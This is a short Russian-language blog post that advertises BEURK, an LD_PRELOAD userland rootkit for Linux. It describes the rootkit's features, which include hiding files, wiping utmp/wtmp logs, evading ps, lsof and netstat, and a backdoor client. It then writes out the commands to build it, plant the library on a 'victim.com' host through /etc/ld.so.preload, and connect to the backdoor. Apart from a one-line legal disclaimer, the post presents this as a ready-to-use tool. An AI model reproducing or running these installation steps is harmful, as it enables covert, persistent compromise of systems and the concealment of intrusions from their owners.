BEURK — Экспериментальный Unix руткит

BEURK — это руткит userload preload для GNU / Linux, сильно ориентированный на анти-отладку и анти-обнаружение.

Особенности

◾Скрыть файлы и каталоги злоумышленников
Очистка журнала реестра (на utmp / wtmp)
◾ Контроль процесса и входа в систему
◾обход unhide, lsof, ps, ldd, netstat analysis
◾Поддержка клиентского PTY клиента

Установка

Сборка

 # git clone https://github.com/unix-thrust/beurk.git
# cd beurk
# make 

Установка

 # scp libselinux.so root@victim.com:/lib/
# ssh root@victim.com 'echo /lib/libselinux.so >> /etc/ld.so.preload' 

Запуск

 # ./client.py victim_ip:port # connect with furtive backdoor 

Скачать BEURK

¯\_(ツ)_/¯

Примечание: Информация для исследования, обучения или проведения аудита. Применение в корыстных целях карается законодательством РФ.

 

cryptoparty

Cryptography is typically bypassed, not penetrated.

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

5e7fa976b0640d40